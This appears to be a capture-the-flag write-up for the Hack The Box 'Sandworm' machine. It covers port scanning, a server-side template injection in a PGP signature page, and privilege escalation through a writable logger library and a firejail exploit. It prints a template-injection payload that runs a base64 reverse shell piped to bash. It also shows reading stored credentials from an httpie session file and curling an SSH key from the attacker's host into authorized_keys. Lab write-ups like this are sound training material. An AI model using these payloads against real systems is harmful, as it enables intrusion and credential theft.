Sandworm
https://app.hackthebox.com/machines/Sandworm
from hackthebox

Port scan
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBH2y17GUe6keBxOcBGNkWsliFwTRwUtQB3NXEhTAFLziGDfCgBV7B9Hp6GQMPGQXqMk7nnveA8vUz0D7ug5n04A=
| 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKfXa+OM5/utlol5mJajysEsV4zb/L0BJ1lKxMPadPvR
80/tcp open http syn-ack nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to https://ssa.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
443/tcp open ssl/http syn-ack nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
| ssl-cert: Subject: commonName=SSA/organizationName=Secret Spy Agency/stateOrProvinceName=Classified/countryName=SA/emailAddress=atlas@ssa.htb/organizationalUnitName=SSA/localityName=Classified
| Issuer: commonName=SSA/organizationName=Secret Spy Agency/stateOrProvinceName=Classified/countryName=SA/emailAddress=atlas@ssa.htb/organizationalUnitName=SSA/localityName=Classified
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-05-04T18:03:25
| Not valid after: 2050-09-19T18:03:25
| MD5: b8b7:487e:f3e2:14a4:999e:f842:0141:59a1
| SHA-1: 80d9:2367:8d7b:43b2:526d:5d61:00bd:66e9:48dd:c223
| -----BEGIN CERTIFICATE-----
| MIIDpTCCAo0CFBEpfzxeoSRi0SkjUE4hvTDcELATMA0GCSqGSIb3DQEBCwUAMIGN
| MQswCQYDVQQGEwJTQTETMBEGA1UECAwKQ2xhc3NpZmllZDETMBEGA1UEBwwKQ2xh
| c3NpZmllZDEaMBgGA1UECgwRU2VjcmV0IFNweSBBZ2VuY3kxDDAKBgNVBAsMA1NT
| QTEMMAoGA1UEAwwDU1NBMRwwGgYJKoZIhvcNAQkBFg1hdGxhc0Bzc2EuaHRiMCAX
| DTIzMDUwNDE4MDMyNVoYDzIwNTAwOTE5MTgwMzI1WjCBjTELMAkGA1UEBhMCU0Ex
| EzARBgNVBAgMCkNsYXNzaWZpZWQxEzARBgNVBAcMCkNsYXNzaWZpZWQxGjAYBgNV
| BAoMEVNlY3JldCBTcHkgQWdlbmN5MQwwCgYDVQQLDANTU0ExDDAKBgNVBAMMA1NT
| QTEcMBoGCSqGSIb3DQEJARYNYXRsYXNAc3NhLmh0YjCCASIwDQYJKoZIhvcNAQEB
| BQADggEPADCCAQoCggEBAKLTqQshN1xki+1sSRa6Yk5hlNYWroPyrVhm+FuKMpNL
| cjW9pyNOV/wvSdCRuk/s3hjqkIf12fljPi4y5IhqfcpTk+dESPGTiXdrE7oxcWHn
| jQvE01MaT9MxtIwGiRBupuFvb2vIC2SxKkKR28k/Y83AoJIX72lbeHJ9GlNlafNp
| OABrIijyFzBou6JFbLZkL6vvKLZdSjGy7z7NKLH3EHTBq6iSocSdxWPXtsR0ifeh
| hODGT2L7oe3OWRvClYTM3dxjIGC64MnP5KumamJoClL2+bSyiQzFJXbvcpGROgTU
| 01I6Qxcr1E5Z0KH8IbgbREmPJajIIWbsuI3qLbsKSFMCAwEAATANBgkqhkiG9w0B
| AQsFAAOCAQEAdI3dDCNz77/xf7aGG26x06slMCPqq/J0Gbhvy+YH4Gz9nIp0FFb/
| E8abhRkUIUr1i9eIL0gAubQdQ6ccGTTuqpwE+DwUh58C5/Tjbj/fSa0MJ3562uyb
| c0CElo94S8wRKW0Mds0bUFqF8+n2shuynReFfBhXKTb8/Ho/2T2fflK94JaqCbzM
| owSKHx8aMbUdNp9Fuld5+Fc88u10ZzIrRl9J5RAeR5ScxQ4RNGTdBVYClk214Pzl
| IiyRHacJOxJAUX6EgcMZnLBLgJ1R4u7ZvU3I3BiaENCxvV6ITi61IwusjVCazRf3
| NNn7kmk7cfgQqPCvmwtVrItRHxWEWnkNuQ==
|_-----END CERTIFICATE-----
| http-methods:
|_ Supported Methods: GET HEAD OPTIONS
|_http-title: Secret Spy Agency | Secret Security Service
8000/tcp open http-alt? syn-ack
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
There was no intresting directories to further investigate.
Foothold
After further enumeration, the best page to further pwn was
/guide
here, we can verify the pgp signature with our public key.

now we create our own public key and signature to verify it here.
Finding web vuln
After we create our signature and public key, let's check it out on the website.

We can see that our name is echo(ed) out. Maybe a SSTI Vulnerability.
We have to manipulate the name parameter. Let's edit our key.
Exploitation
Enter the following command :
gpg --edit-key 6941D2162010EED2C <--REDACTED--> # YOUR KEY
To select the uid: (Enter the number that is along with your key)

A
*
will appear once it's selectedCreating payload :

The blue line denotes the command, the yellow denotes the payload.
Create a signed message :
gpg --clearsign --output signature.asc --local-user <your key> message.txt
Export public key
gpg --export --armor <your key> > heapbytes.pub
SSTI
We can confirm that SSTI can be expoitated here.

Repeat the steps with your own payload
The one I used was :
#create rev shell payload from https://revshells.com
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('echo " <replace your base64 encoded rev shell payload>" | base64 -d | bash').read() }}

And we got the shell
User shell
After a few while, I found an intresting file which had the password of the user.
~/.config/httpie/sessions/localhost_5000/admin.json
SSH with the creds

DONE
Privilage Escalation (2)

Source code of the running application

It's using a logger library, and fortunately we have access to write down into that library.
Path of the logger library :

Let's edit the library code

Wait for few minutes (less than 2 mintues) to get the shell.
Privilage Escalation (root)

We are going to use this script to get root
https://gist.github.com/GugSaas/9fb3e59b3226e8073b3f8692859f8d25
We can add our
ssh keys
into the remote machine for better shell experience.Create your own key with :
ssh-keygen -t rsa -b 4096 -C "your_mail@domain"
Copy the
~/.ssh/id_rsa.pub
into remote machine under/.ssh/
I used curl to download the file since vim was not working properly (maybe stablize shell and resume)
curl <your-ip>/id_rsa.pub ~/.ssh/authorized_keys
chmod 700 ~/.ssh
chmod 600 ~/.ssh/authorized_keys
boom, we just need to ssh now and run the script, I used curl agian to copy the script from my local machine to the remote machine.

Run the
firejail --join=<id>
command as prompted into another ssh shell.now run
su -
orsu
for the root shell.

__________heapbyte's still pwning.
Last updated